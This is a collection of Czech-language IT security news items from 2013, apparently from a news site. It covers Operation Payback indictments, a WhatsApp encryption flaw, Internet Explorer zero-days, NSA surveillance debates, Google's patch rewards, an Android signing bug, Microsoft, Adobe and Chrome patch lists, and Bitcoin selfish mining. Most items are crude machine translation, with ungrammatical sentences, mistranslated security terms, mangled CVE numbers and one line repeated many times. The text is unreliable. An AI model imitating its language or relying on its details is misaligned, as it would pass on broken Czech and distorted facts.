Rusbridger si myslí, že lidé z bezpečnosti nikdy o debatu nestáli a chtěli by v tajnosti držet vše. „Nechcete, aby o tom psal tisk nebo kdokoliv jiný. Ale MI5 nemůže být v této debatě jediným hlasem.“ Rusbridger také dodal, že Guardian odhalil „rozsah, v jakém je celá populace potenciálně pod dohledem.“
Na Parkerovy obavy, že zveřejnění tajných informací pomáhá teroristům, Rusbridger odpověděl: „To budou říkat všichni. Když se podíváte na dějiny výzvědných služeb, zjistíte, že to samé říkali už v roce 1990.“
Nezávislý člen parlamentu Patrick Mercer míní, že by data zveřejněna být neměla, pokud by to narušilo bezpečnost veřejnosti. „Pokud je ohrožena bezpečnost odhalením příliš mnoha informací, je to chyba. Jen si představte, že bychom odhalili všechna tajemství kolem Enigmy během druhé světové války. Veřejnost by to sice zajímalo, ale válku bychom prohráli.“
Několik IT pracovníci mezi "Operation Payback" obviněných
10.10.2013 Kriminalita | Bezpečnost
Poslední várka Anonymní hacktivists, kteří se zúčastnili v roce 2010 Operation Payback proti autorských organizací, advokátních kanceláří a amerických politiků a finančních a e-platby organizacím, byl obviněn minulý týden ve Virginii. Třináct muži stojí obviněn z toho, že organizoval a účastnil - spolu s dalšími členy Anonymous - v koordinované sérii útoků (DDoS), ve kterých Asociace nahrávacího průmyslu Ameriky (RIAA), Motion Picture Association of America (MPAA), Spojené státy Copyright Office of theLibrary Kongresu, Visa, MasterCard, Bank of America, Amazon, a mnoho dalších, a po použití a distribuované stresové testování / DDoS programu známého jako Low Orbit Ion Cannon. Jedná se o to první obvinění vznesené proti Anonymní členové, kteří se účastnili této operace, ale podle The Verge , tato obvinění ukázat trochu více možností, pokud jde o věk a povolání, vzpírá dlouhodobé image Anonymní hackeři jako dospívající se nic lepšího na práci. pravda, že většina obviněných jsou v jejich 20s, ale dva z nich - Geoffrey Kenneth velitel a Dennis Owen Collins - jsou 65 a 53, resp. 28-rok-starý Phillip Simpson pracuje od roku 2009 jako správce systému v různých společnostech a University of Arizona a je v současné době pracuje na přezkumu advokátské zkoušky služby. 22-letý Anthony Tadros je ještě student, ale také pracoval jako bezpečnostní analytik pro univerzitu navštěvuje. A konečně, 27-letý Ryan Gubele zřejmě pracoval pro řadu známých firem - včetně Amazon - jako sysadmin, technická podpora systémů technik, a tak dále. současné době je zaměstnán na Twitteru jako inženýr webu spolehlivosti a podle obžaloby, on byl ten, kdo byl dohlížet na účinnost útoku DDoS proti MPAA stránky a vydalo varování, kdy byl pozemek přestěhovali na jinou IP adresu. On také přistupovat RIAA síťových zdrojů. Když navázal Greg Sandoval, Gubele a Simpson odmítl vyjádřit k obžalobě a Tadros prostě řekl, že to bylo v jeho nejlepším zájmu, není odpovědět na všechny otázky týkající se jeho situace, když je případ probíhá
WhatsApp šifrování chyba ukázalo, POC zveřejněny kód
10.10.2013 Zranitelnosti | Zabezpečení
Holandský výzkumník říká, že řešení pro šifrování provádí populární multiplatformní IM služby WhatsApp je vadný. Tvrdí, že společnost nemyslel to tak dobře, jak by měl, a že uživatelé by si měli uvědomit, že jejich WhatsApp zprávy by mohly být snadno dešifrovat útočníky. WhatsApp má svůj spravedlivý podíl problémů Ochrana osobních údajů a společnost zavedla zprávu Šifrování v srpnu 2012, ale nebyla specifikována, co šifrovací metoda je použita. Nyní, díky Thijs Alkemade, informatika a matematika student na univerzitě v Utrechtu a Lead Developer pro Adium, open-source IM klienta pro Mac OS X, víme, že Nejenže WhatsApp používat stejný (RC4) šifrovací klíč pro zprávy v obou směrech, ale také stejný HMAC klíč pro ověření zprávy. "Ale MAC samo o sobě nestačí k odhalení všech forem manipulace: útočník mohl klesnout specifické zprávy, které je swap, nebo dokonce přenášet je zpět odesílateli, "řekl poukazuje . TLS pulty tím, že včetně pořadové číslo ve formátu prostého textu každé zprávy a pomocí jiného klíče pro HMAC pro zprávy ze serveru na klienta a zpráv od klienta k serveru. WhatsApp nepoužívá takový čítač sekvencí, a to opakovaně klíč použitý pro RC4 pro HMAC. " Aby jí dokázal svou pravdu, on také vytvořil skript v Pythonu, který může zachytit zprávy WhatsApp a která se snaží dešifrovat příchozí zprávy hádat vłechna odchozí zprávy. Když po reprodukovat výsledky s úřední client WhatsApp, on pokračoval s výzkumem a prokázaly , že oficiální Android a Nokia S60 klienti jsou tak zranitelné. "Měli byste předpokládat, že každý, kdo je schopen odposlouchávat vaše připojení WhatsApp je schopen dešifrování zpráv, daný dost úsilí. Měli byste zvážit všechny své předchozí WhatsApp ohrožena rozhovory, "dodal s tím, že WhatsApp uživatelé nemohou dělat nic, aby se ochránili - kromě přestat používat aplikace, dokud nebude možné aktualizovat odstranit nedostatky. Zdá se, že řešení je jednoduché: Vývojáři by měli zvážit použití "řešení, která byla přezkoumána, aktualizována a stanoveny pro více než 15 let, jako TLS."
Neočekávaný IE Zero Day užívaných v bankovnictví, hry Útoky
10.10.2013 Zranitelnosti | Hacking | Bezpečnost
Jednalo se o dva-pro-jeden obchod, který správcům systému Windows mohl udělat bez.
Již očekával jednu náplast Internet Explorer zero-day aktivně využívány, správci dostali opravy pro dva nula dní místo dnes jako součást října 2013 Microsoft aktualizace Patch Tuesday zabezpečení.
Druhý překvapivě, zejména organizace již kymácející se ve větru bez náplasti po dobu jednoho IE chyby použitého v aktivních útoků, a pro které Metasploit exploitu byl k dispozici. Bonus oprava byla pro nepříbuzného chyby ve volné přírodě na blízko měsíčně a také zaměření organizace v Japonsku a Koreji, podobně jako první den nula.
Vědci z Národního Cyber bezpečnostního střediska v Nizozemsku, IOprotect GmbH a Trustwave SpiderLabs byly připsány v poradenských společností Microsoft za oznámení chyby zabezpečení. SpiderLabs "ředitel bezpečnostního výzkumu Ziv Mador řekl Threatpost společnosti výzkumníci byli sledování útoku server, který měl ještě před dvěma týdny byla slouží využije pro záplatami zranitelností pouze. To se změnilo na 12 září, Mador řekl, když provozují IE 8 probublává na povrch, že jeho vědci předtím neviděl.
"To se používá k distribuci malwaru obecný," řekl Mador. "Na rozdíl od předchozího nulové den v IE, tohle distribuuje malware krást přihlašovací údaje z online hráčů, nebo přerušit přístup na stránky bank. Je to obecně malware, ne cílené útoky. "
Dříve hlášeny IE nula den byly použity ve velmi cílené útoky proti japonským mediálních společností. Mediální stránky byly ohroženy jako součást útoku zalévání děr a sloužili využije, podle výzkumníků na FireEye, zaměřených na vládu, high-tech a výrobních organizací v Japonsku. FireEye nazval rozsáhlý shromažďování informací operace.
Microsoft se pustil Fix-It nástroj jako dočasný zmírnění na odhalení, že útoky byly v divočině. Minulý pátek byl exploit Metasploit modul přidá do nástrojů, stupňovat možnost, že rozšířenější útoků by mohla být na spadnutí.
Druhý den nula cílené uživatele v Japonsku a Koreji přes drive-by download. Jeden rys je jeho schopnost identifikovat jazyk infikovaný počítač byl nakonfigurován tak, aby. Pokud ani Japonec Korejský ani by IE přesměrovat na Google a útok by byla ukončena, Trustwave řekl blogpost.
Nicméně, pokud se ověřuje jazyka a IE 8, útok používá ROP řetězy obejít ochranu nativní paměti na Windows, jako je DEP a ASLR.
Útok náklad obsahuje ne méně než 10 řidičů, spustitelné soubory a DLL klesl na oběti stroj, Trustwave řekl. Pokusí se zakázat řadu bezpečnostních produktů na počítači, přesměrování bankovní weby k útočníkovi kontrolované oblasti a také komponenty, které se snaží ukrást herní pověření.
"Exploit není triviální a tyto typy využije často nejsou triviální. Vyžadují řadu velmi kreativních kombinací do práce, "řekl Mador. "To byl ten případ."
Kromě ROP řetězců, útok také používá element modelu DOM vlastností Spray techniky používané v jiných IE nula den opravenou včera.
"Existuje milion způsobů, jak rozvíjet HTML stránky nebo webové aplikace, tolik atributů, tagy, skripty. Lidé, kteří vyvíjejí prohlížeče budou muset vypořádat s obrovským množstvím možných scénářů, "Mador řekl a ukázal na množství přírodních míst, kde zranitelná kód by mohl skrývat v parsování a vykreslování některé z těchto složek.
"Když se podíváme na kód zneužití je pro prohlížeče zranitelnosti, často používají podivné kombinace z hlediska HTML, které nedávají smysl," řekl Mador. "Nezdá se, že ukázat něco zajímavého, ale účel kombinací je vyvolat nějakou chybu zabezpečení v kódu syntaktické analýzy nebo správu paměti."
Patch byl součástí kumulativní aktualizace pro IE řešena v MS13-080 , tj. byla oprava téměř každý měsíc v roce 2013, včetně mimo pásmo náplasti na začátku tohoto roku.
technologové Zkoumat Vliv úřadu NSA na hospodářství, důvěra
10.10.2013 Šifrování | Bezpečnost
Pokud hledáte pro stříbrné obložení mezi Snowdena netěsnosti a šíři činností dozoru NSA, je lze nalézt ve dvou věcech: 1) matematika dodržování technologie šifrování je, pokud víme, pevná a 2) Tor zřejmě řídí špionážní agenturu USA praštěný.
"Divím se, že," řekl Matt Blaze, cryptographer a profesor na University of Pennsylvania, "na to, jak málo z tajemství NSA se vztahují k tomu, jak prolomit šifrování."
Kromě toho a nedávné odhalení, že NSA měl poměrně málo jedinců, kteří komunikují sledování úspěšnosti a přesunout on-line pomocí sítě Tor, bude se týče vytvoření přísně tajné interní prezentace s názvem "Tor smrdí", tam není Zdá se, že mnoho dělat technologové úsměv v těchto dnech.
Blaze byl jedním z pěti odborníků na technologii panelu středu během celodenního programu Cato Institute v oblasti dozoru NSA. Panel, který zahrnoval Karen Reilly Projektu Tor, David Dahl z SpiderOak, Jim Burrows Silent Circle a Chris Soghoian z ACLU, obsazení technickou kontrolu o činnosti NSA a její dopad na důvěru v technologie a internetu schopnost bezpečně podporovat komunikaci a elektronického obchodování.
Senátor Ron Wyden, D-Oregon, porazit ekonomickou buben brzy ráno s vášnivou keynote bubnování podporu pro svůj dvoustranný zákona doufá, že skončí hromadný sběr Američanů telefonní záznamy NBÚ, stejně jako přinést sledování reformy. Wyden rovněž poukázal na to, že on měl rozhovory s hlavními obchodními vůdci obávají ekonomických dopadů údajné podvracení NSA bezpečnostních technologií a vztahů to má s velkými telekomunikační a internetové společnosti z hlediska dlouhodobého přístupu k zákaznických dat.
"Politici, kteří se zaregistrují sleva na příliš široké programů dozoru by měly být uvažování o dopadu na amerických pracovních místech, a důvěru," řekl Wyden. "Důvěra je tak důležité pro americké firmy, aby po celém světě. Nemají tuto důvěru osmózou, ale to bylo vydělal v průběhu let prostřednictvím pevných obchodních praktik. "
Soghoian zdůraznil, že společnosti jako SpiderOak, který poskytuje bezpečné zálohování služby a Silent Circle, který poskytuje bezpečné telefonní služby, jsou v jedinečné pozici, protože jsou rozděleny podle funkcí zabezpečení a ochrany osobních údajů ve svých produktech. Silent Circle nedávno okenice svou e-mailovou službu, spíše než někdy být nucen předat údaje o zákaznících na vládu, jeho rozhodnutí přišlo v patách rozhodnutí Lavabit je uzavřít své brány. Lavabit byl bezpečný e-mailových služeb, stejně, to bylo používáno Edward Snowdena, a spíše než zase přes soukromé klíče pro dešifrování oznamovatele je e-maily, se rozhodla ukončit své dveře trvale.
"Spojené státy jsou lídrem v oblasti malé a střední podniky, které poskytují bezpečné komunikační služby," řekl Soghoian. "Když americká vláda nutí k Lavabit dodržovat, je to rozsudek smrti. Dodržujte, a vaše reputace je zničena. Bezpečné komunikační služby jsou v ohrožení. Měli bychom chtít tuto část ekonomiky k růstu. "
NSA je obviněn z podvracení šifrovacích standardů, injektáže se do vývoje těchto norem zúčastněných a přispívajících do Národního institutu pro standardy a technologie (NIST) a oslabení standardů úmyslně, nebo jít tak daleko, že injekci zadní vrátka, aby se přístup komunikace později. To také byl obviněn obdobné činnosti s bezpečnostním software a hardware, výsadba zadní vrátka do kódu a hardware s cílem udržet trvalý přístup a dohledu volný přístup do těchto produktů.
Soghoian prosil novináře, s přístupem k Snowdena dokumentů odhalit tajemství, které byly dosud upravenou, pravděpodobně provedeno ve spolupráci s vládou.
"Věci, které musíte vidět, jsou zdroje novináři musíte mít tajné názvy algoritmů, které byly rozvráceny. Názvy společností NSA rozvrátil a sabotoval produkty, "řekl Soghoian. "Musíme to vědět na ochranu veřejnosti."
Soghoian řekl přísně tajné slide prezentace vydané veřejnosti Guardian redigován jména dvou výrobců čipů VPN, které byly backdoored NBÚ a GCHQ.
"Chceme vědět, jaké jsou backdoored s cílem chránit lidi," řekl Soghoian. "To jsou věci, novináři mají pocit, že musí chránit."
Tor, zatím je ve stoje jako spolehlivém médiu. Být open source, Reilly uvedl, nutí uživatele důvěřovat kódu spíše než lidi za to. Zdůraznila, že předpoklad, za jak Tor funguje zvuk zůstává i přes mírné úspěchu NSA odhalil, že měl při sledování malého počtu uživatelů.
"Budeme přidávat další šifrování mezi relé brzy, ale jsem si jistý, že distribuované trust model bude nadále pracovat a být přijat s dalšími technologiemi," řekl Reilly.
Burrows, mezitím řekl, že vzal velkou radost do bojů NSA se Tor.
"Ano, mají metody pro získání na některé lidi občas, ale i oni říkají Tor funguje a je to zvedl," řekl Burrows. "A to je to zvedl na ně mě potěšilo víc než cokoli jiného."
Google platit odměny záplat na open source projektů
10.10.2013 Zranitelnosti | Bezpečnost
Google, jeden z prvních společností, které nabízejí významné chyby nájemný programu , rozšiřuje své odměny výzkumných a vývojových pracovníků, kteří se podílejí záplaty různých open-source projektů a mají vliv na bezpečnost projektu.
Nové odměny budou pohybovat od $ 500 až $ 3,133.70, a jsou výsledkem společnosti hledají nové způsoby, jak zlepšit bezpečnost svých klíčové součásti, jako je Chrome OS a prohlížeč Chrome. Google má zranitelnosti věrnostní program pro ty nabídky již několik let, a přilákaly velké množství příspěvků. Poznámky k vydání nových verzí Chrome, například, často úvěr litanie externí badatele k předkládání chyb. Odměny jsou často na $ 1000 až 3000 dolar rozsahu, ale může vyletět do desítek tisíc za zvlášť závažných chyb.
Ale rozšíření programu je důkazem toho, jak těžké to může být zabezpečených aplikací, zejména open source projekty, které se spoléhají na kódu z různých zdrojů. Takže Google bude nyní platit vývojářům odměny pro zlepšení bezpečnosti vztahující se k věci, jako OpenSSL, OpenSSH a svázat.
"Ať už chcete přejít na bezpečnější alokátoru, přidat oddělení výsady, uklidit spoustu povrchní volání strcat (), nebo i jen k tomu, aby ASLR - chceme pomoci!" Michal Zalewski týmu Google bezpečnosti uvedl v blogu .
"Máme v úmyslu zavést program postupně, na základě kvality obdržených podání a zpětná vazba od komunity vývojářů."
Komponenty, které jsou součástí programu, v počáteční fázi jsou:
Základní služby síťové infrastruktury: OpenSSH, BIND, ISC DHCP
Základní infrastruktura analyzátory obrazu: libjpeg libjpeg-turbo, libpng, giflib
Open-source základy Google Chrome: chrom, Blink
Ostatní velkým dopadem knihovny OpenSSL, zlib:
Security-kritické, běžně používané komponenty jádra systému Linux (včetně KVM)
Za účelem získání nároku na odměnu od Google, oprava podání od developera musí mít prokazatelný ", významné a proaktivní dopad na bezpečnost" daného komponentu. Program se vztahuje i na vývojáře, kteří pracují na projektech i externí vývojáře, kteří prostě vidí problém, že chcete pomoci opravit. Chcete-li nárok na odměnu, předložený náplast je vlastně loď.
Kromě odměnu až do výše $ 3,133.7 Google může zaplatit vyšší odměny pro opravdu chytré podání.
"Můžeme zvolit vyšší odměny za neobvykle chytrý nebo komplexní podání, můžeme také rozdělit odměnu mezi zadavatelem a správcům projektu v případech, kdy oprava vyžaduje značné další úsilí jménem vývojového týmu," jsou pravidla pro Program říct.
Vývojáři předložit své záplaty přímo správci daného projektu, a jakmile se náplast ve skutečnosti je dodáván jako součást projektu, jednoduše pošlete email na Google s detaily.
Dalším Android "master key" chyba odhalila
13.11.2013 Mobil | Bezpečnost | Zranitelnosti
Existence jiného "master klíč" chybu, která může být použita, aby se zasadila malware na uživatele Android zveřejněn Jay Freeman (aka Saurik), technologie konzultant a bezpečnostní výzkumník, který objevil chybu ve stejnou dobu jako předchozí dva byly našel a zveřejněny v červenci. Freeman nešel veřejnost s jeho vědomím té doby, a místo toho oznámila společnost Google vady, aby mohla být stanovena v příchozím aktualizaci operačního systému. Ale teď, když je aktualizace, on sdílel chyba podrobnosti na blogu . Stručně řečeno, chyba je podobná druhé nalezeného a umožňuje malware trhovců vyměnit legitimní, ověřené aplikace jedním, který má škodlivý software přidal na to vše bez zařízení špinění lest a zastavit. Nebudu jít hluboko do technických detailů, jako Freeman příspěvek vysvětluje dokonale problém, zahrnuje PoC o exploit pro ni, a vysvětluje, jak může být oprava chyby . Případně Sophos Paul Ducklin to i rána do zaměstnání vysvětlujícím brouka složitosti. Uživatelé, kteří své aktualizované Android instalaci na nejnovější (4,4 - KitKat) verze jsou jediní, jejichž zařízení v současné době nemůže být napaden škodlivým aplikacím kteří nevyužijí tento nedostatek. Vzhledem k tomu, KitKat vyšlo o něco více než před týdnem, Android a aktualizace jsou obvykle pomalu dosahují skutečné zařízení, jen Google Nexus majitelé jsou tak daleko, trezor. Google si klade za cíl přinést většinu uživatelů k tomuto nejnovější verzi co nejdříve, ale realistická očekávání a oznámila termíny poukázat především na aktualizace v roce 2014.
Porazí Samsung s Androidem v korporacích Apple?
13.11.2013 Bezpečnost | IT
Mobilní svět se mění velmi rychle. S končící slávou BlackBerry začíná boj dvou hlavních rivalů, kteří vládnou světu smartphonů. I když měl Apple jistý náskok, během roku se v korporacích pozice zařízení s Androidem a iOS zcela vyrovnaly.
Na samém počátku byl uzavřený ekosystém systémy iOS velkou výhodou z hlediska bezpečnosti, zatímco uvolněnost a otevřený zdrojový kód Androidu noční můrou. Přinejmenším pro oddělení bezpečnosti a podpory uživatelů ve velkých korporacích. Situace se ale v posledním roku značně změnila. Přispělo k tomu nejvíce posilování firmy Samsung, která má dnes pod kontrolou více než 60 procent trhu. Současně se snaží zaměřit na potřeby korporací různými bezpečnostními iniciativami, například technologií Knox.
Knox je řešení jdoucí cestou kontejnerizace a pracuje na aplikační vrstvě. Ve své podstatě je to bezpečný kontejner, ve kterém mohou firemní aplikace běžet izolovaně od aplikací osobních. Tento přístup je možný především díky volnému přístupu k operačnímu systému, což firma Apple neumožňuje. Na aplikační vrstvě mohou vývojáři přidávat bezpečnostní funkce, jako je například znemožnění kopií obrazovky či funkcí kopírování a vkládání, podle aplikace.
Přesně tato filosofie nevyhovuje firmě Apple, jejíž vývojáři podobné možnosti úmyslně nedostávají, především díky ztrátě konzistence a vlivu na použitelnost aplikací. Ostatně, Knox podporuje momentálně jen několik aplikací v Google Play Store, řada mobilních operátorů Knox nepodporuje a s jeho nasazením jsou spojeny i další náklady – jednak roční aktivní poplatek a nutnost provozovat server MDM (mobile device management) s podporou Knoxu.
Nicméně uvedením Knoxu na počátku tohoto roku se Samsung zviditelnil pro řadu společností jako spolehlivý dodavatel bezpečného mobilního hardwaru a posílil na tolik, že se v závodu o přízeň korporací dostal před samotný Apple. A to i přes to, že Knox funguje jen na několika highendových zařízeních jako je Galaxy S4 nebo Note 3. Podle představitelů Samsungu se technologie postupně začne objevovat i v nižších produktových řadách a celý ekosystém může jen získat, pokud se podobné inovace budou šířit i do standardní platformy Android.
Apple samozřejmě nemůže a nechce stát stranou a jeho právě uvedený iOS 7 nabízí řadu funkcí určených pro korporace. Obsahuje vlastní implementaci „kontejnerizace“, jednotné přihlášení pro všechny korporátní aplikace, možnost sdíleného přístupu VPN atd. V tomto okamžiku mají Apple i Android stejnou bezpečnostní certifikaci FIPF 140-2, což obě platformy umožňuje nasazovat ve společnostech, které musí splňovat vyšší bezpečnostní standardy. To vše oslabuje pozici především firmě BlackBerry, jejíž nový operační systém BlackBerry 10 na trh přišel příliš pozdě, dlouho se čekalo na jeho bezpečnostní certifikaci a situaci určitě nepomohlo neustálé propírání potenciálního rozdělení a rozprodeje firmy.
Záplaty Listopad 2013
12.11.2013
System Center Správa balíček pro System Center 2012 R2 ServiceManageru | ZDARMA DATUM VYDÁNÍ: 11.12.2013 | |
Tento nástroj je nabízen, protože byla zjištěna nekonzistence v úložišti údržby systému Windows, která může zabránit úspěšné instalaci budoucíchaktualizací , servisních balíčků a softwaru. | ZDARMA DATUM VYDÁNÍ: 11.11.2013 | |
Tento nástroj je nabízen, protože byla zjištěna nekonzistence v úložišti údržby systému Windows, která může zabránit úspěšné instalaci budoucíchaktualizací , servisních balíčků a softwaru. | ZDARMA DATUM VYDÁNÍ: 11.11.2013 | |
Tento nástroj je nabízen, protože byla zjištěna nekonzistence v úložišti údržby systému Windows, která může zabránit úspěšné instalaci budoucíchaktualizací , servisních balíčků a softwaru. | ZDARMA DATUM VYDÁNÍ: 11.11.2013 | |
Tento nástroj je nabízen, protože byla zjištěna nekonzistence v úložišti údržby systému Windows, která může zabránit úspěšné instalaci budoucíchaktualizací , servisních balíčků a softwaru. | ZDARMA DATUM VYDÁNÍ: 11.11.2013 | |
Tento nástroj je nabízen, protože byla zjištěna nekonzistence v úložišti údržby systému Windows, která může zabránit úspěšné instalaci budoucíchaktualizací , servisních balíčků a softwaru. | ZDARMA DATUM VYDÁNÍ: 11.11.2013 | |
Tento nástroj je nabízen, protože byla zjištěna nekonzistence v úložišti údržby systému Windows, která může zabránit úspěšné instalaci budoucíchaktualizací , servisních balíčků a softwaru. | ZDARMA DATUM VYDÁNÍ: 11.11.2013 | |
Tento nástroj je nabízen, protože byla zjištěna nekonzistence v úložišti údržby systému Windows, která může zabránit úspěšné instalaci budoucíchaktualizací , servisních balíčků a softwaru. | ZDARMA DATUM VYDÁNÍ: 11.11.2013 | |
Tento nástroj je nabízen, protože byla zjištěna nekonzistence v úložišti údržby systému Windows, která může zabránit úspěšné instalaci budoucíchaktualizací , servisních balíčků a softwaru. | ZDARMA DATUM VYDÁNÍ: 11.11.2013 | |
Tento nástroj je nabízen, protože byla zjištěna nekonzistence v úložišti údržby systému Windows, která může zabránit úspěšné instalaci budoucíchaktualizací , servisních balíčků a softwaru. | ZDARMA DATUM VYDÁNÍ: 11.11.2013 |
11. 2013 Microsoft Patch Tuesday
12.11.2013 Zranitelnosti
Přehled oprav 11. 2013 Microsoft a jejich stav.
# Ovlivněno Kontraindikace - KB Známé Využije Microsoft hodnocení (**) ISC hodnocení (*)
klienti servery
MS13-088 Kumulativní aktualizace zabezpečení pro aplikaci Internet Explorer
(Nahrazuje MS13-080 )
Internet
KB 2888505 Ne. Závažnost: Kritická
zneužitelnosti: 1,2,3 Kritický Důležitý
MS13-089 Umožňující vzdálené spuštění kódu ve Windows Graphics Device Interface
(Nahrazuje MS08-071 )
GDI + CVE-2013-3940
KB 2876331 Ne. Závažnost: Kritická
zneužitelnosti: 1 Kritický Důležitý
MS13-090 Umožňující vzdálené spuštění kódu v InformationCardSigninHelp ActiveX třídy
(Nahrazuje MS11-090 )
ActiveX (icardie.dll) CVE-2013-3.918
KB 2900986 Ano. Závažnost: Kritická
zneužitelnosti: 1 Patch NYNÍ! Důležitý
MS13-091 Umožňující vzdálené spuštění kódu v aplikaci Microsoft Office
(Nahrazuje bulletinu zabezpečení MS09-073 )
Microsoft Office (Word), CVE-2013-0082 CVE-2013 - 1324 CVE-2013 - 1325
KB 2885093 Ne. Závažnost: Důležité
zneužitelnosti: 1,3 Kritický Důležitý
MS13-092 Zvýšení Oprávnění zabezpečení v HyperV
HyperV Hosté (DoS pro hostitele) CVE-2013-3898
KB 2893986 Ne. Závažnost: Důležité
zneužitelnosti: 1 Důležitý Důležitý
MS13-093 Informace Discolsure Chyba zabezpečení pomocnou funkci ovladače
(Nahrazuje MS12-009 )
Pomocné Funkce ovladače CVE-2013-3887
KB 2875783 Ne. Závažnost: Důležité
zneužitelnosti: 3 Důležitý Důležitý
MS13-094 Přístup k informacím Chyba zabezpečení v aplikaci Outlook
(Nahrazuje MS13-068 )
Outlook CVE-2013-3905
KB 2894514 Ne. Závažnost: Důležité
zneužitelnosti: 3 Důležitý Méně důležité
MS13-095 Odmítnutí zabezpečení služby v digitální podpisy
(Nahrazuje Advisory 2661254 )
Digitální podpisy CVE-2013-3869
KB 2868626 Ne. Závažnost: Důležité
zneužitelnosti: 3 N / A Důležitý
Budeme aktualizovat problémy na této stránce asi týden nebo tak, jak se vyvíjejí. Vážíme aktualizace se sídlem v USA mohou zákazníci volat Microsoft zdarma opravy související podpory na čísle 1-866-PCSAFETY
Adobe, Google a další Patch Tuesday patche
12.11.2013 Zranitelnosti
Adobe
Adobe vydala dvě návěstí dnes:
(Oprava: APSB13-25 byl propuštěn minulý měsíc, a já ji odstranili z tohoto deníku Místo toho, APSB13-27 přidal níže).
APSB13-26: Aktualizace zabezpečení pro aplikaci Flash Player
Tato aktualizace se týká systému Windows, OS X a také Linux verzi Adobe Flash Player 11,9 (11,2 u Linxu), stejně jako prostředí Adobe AIR 3.9. Zranitelnost Flashplayer je přiřazena priorita "1" na Windows a OS X, který označuje exploit byl spatřen ve volné přírodě a Adobe doporučuje náplast "co nejdříve" (72 hod.).
Chyby jsou pokryty tímto patchem: CVE-2013-5329, CVE-2013-5330.
APSB13-27: Hotfix pro ColdFusion
Odkaz na tento informační zpravodaj je k dispozici na bezpečnostní Adobe bulletinu stránky a datum vydání je 12.listopadu (dnes), ale odkaz nefunguje právě teď.
Google uvolnil novou verzi prohlížeče Chrome dnes: Chrome 31. Aktualizace obsahuje 25 bezpečnostní opravy . Není to zrovna bezpečnostní záplatu, ale stále zajímavé: Chrome 31 zvyšuje SSL šifry přidáním podpory pro AES-GCM šifer.
12 Selhávání pevné v prohlížeči Google Chrome
12.11.2013 Zranitelnosti
Google opravil 12 bezpečnostních chyb v prohlížeči Chrome , včetně šesti vysoce rizikových chyb. Nová verze prohlížeče obsahuje řadu oprav chyb nalezených pro externí badatelé stejně jako vlastní Google vnitřní bezpečnostní tým.
Dva z vážnějších chyb záplatované v Chrome jsou use-after-volné chyby v různých prvků prohlížeče, a tam jsou také dvě z hranic čte v prohlížeči. Ty jsou uvedeny jako vysoce rizikové nedostatky, stejně. Ale možná nejzajímavější Opravena chyba v nové verzi se středním rizikem zranitelnosti týkající se procesu vyjednávání TLS. Během tohoto procesu Chrome nedokázal dělat kontrolu některých osvědčení, s nimiž se setkávají.
Zde je kompletní seznam chyb opravených Chrome 31:
500 dolarů] [ 268565 ] Střední CVE-2013 - 6621: Použijte po volném vztahující se k prvkům řeči vstupů. Úvěry Khalil Zhani.
[$ 2000] [ 272786 ] High CVE-2013-6622: Použijte po volném souvisí s mediální prvky. Úvěr cloudfuzzer .
[500 dolarů] [ 282925 ] High CVE-2013-6623: Out of bounds číst v SVG. Úvěr miaubiz .
[$ 1000] [ 290566 ] High CVE-2013 - 6624: Použijte po volném souvisí s "ID" atribut řetězce. Kreditní Jon Butler .
[$ 2000] [ 295010 ] High CVE-2013 - 6625: Použijte po zpětném zdarma v rozsazích DOM. Úvěr cloudfuzzer .
[ 295695 ] Low CVE-2013 až 6626: Panel Adresa spoofing souvisí s intersticiální varování. Úvěry Chamal de Silva .
[4000 dolarů] [ 299892 ] High CVE-2013-6627: Out of bounds číst v parsování HTTP. Úvěr skylined .
[$ 1000] [ 306959 ] Střední CVE-2013 - 6628: Problém s certifikáty nebyly kontrolovány při sjednání TLS. Úvěry Antoine Delignat-Lavaud a Karthikeyan Bhargavan z Prosecco z INRIA Paříži .
[ 315823 ] Středně kritické CVE-2013 - 2931: Různé opravy z interních auditů, fuzzing a dalších iniciativ.
[ 258723 ] Střední CVE-2013 až 6629: Přečtěte si o neinicializované paměti v libjpeg a libjpeg-turbo. Kredit Michal Zalewski společnosti Google.
[ 299835 ] Střední CVE-2013 až 6630: Přečtěte si o neinicializované paměti libjpeg-turbo. Kredit Michal Zalewski společnosti Google.
[ 296804 ] High CVE-2013 - 6631: Použijte po zpětném zdarma libjingle. Kredit Patrik Hoglund projektu Chromium.
Jako součást svého programu bug odměnu, Google vyplaceno 11.000 amerických dolarů v roce prémií pro externí badatele.
Selfish Horníci by mohl zneužít P2P Povaha Bitcoin sítě
12.11.2013 Zranitelnosti | Bezpečnost
Výzkumní pracovníci a akademici jsou jen na začátku procesu se snaží posoudit hodnotu nedávno publikovaném na zranitelnosti v Bitcoin protokolu, některé z nich jsou tvrdí, že je menší bod, který má být v minul na všechny tam a zpět: To je problém s peer-to-peer nastavení sítě Bitcoin, které by mohly být využity za účelem zisku.
Hlavní tvrzení v Bitcoin Cornell výzkumných papíru je, že kartelová dohoda tzv. sobeckých horníků které představují nejméně jednu třetinu z celkové těžby populace by nakonec mohla vydělat víc než je jejich spravedlivý podíl příjmů Bitcoin. To by pak mohla vést k efektu sněhové koule, které by mohlo způsobit další horníci se k této kartelové dohodě v naději, že větší finanční odměny. Některé další vědci a akademici proti tomuto tvrzení a řekl, že to není tak, že lidé budou chovat v reálném světě, a to je těžké předvídat chování velkých skupin osob, zvláště když se jedná o peníze.
Ale pár výzkumníků, kteří analyzovaných noviny říkají, že tam je jiný problém, který je na papír Cornell, který je přehlížen, a sice, že útočník postavení v síti Bitcoin může dělat rozdíl v tom, jak útok funguje.
"Tady je ta věc: toto je poprvé, závažný problém s konsensuální mechanismus Bitcoin je využila peer-to-peer aspekt systému. To je problém pro naši schopnost uvažovat o Bitcoin. Kryptografie v Bitcoin je považován za solidní. Máme také nějaké schopnosti modelovat a psát rovnice o pobídky hornických a chování. Na základě toho jsme si mysleli, měli pádné důvody se domnívat, že "X% horníků může vydělat více než X% těžby příjmů", "Andrew Miller z University of Maryland a Arvind Narayanan Princeton univerzity napsal v nové analýze papíru .
"Ale pokud je síťové pozice může změnit na útočníkův vyhlídky, všechny tyto sázky jsou pryč. Nedostatky, které jsou závislé na útočníka vytváření "Sibyla" uzly v síti jsou velmi odlišné kategorie. Bitcoin je P2P síť je "otevřený pro veřejnost." Uzly mohou přicházet a odcházet, jak se jim zachce, a neočekává se, že poznat sebe. Spuštění uzlu Bitcoin znamená být ochoten akceptovat připojení od neznámých osob. To je problematické použít stávající teoretické modely pro vyhodnocování bezpečnosti Bitcoin. "
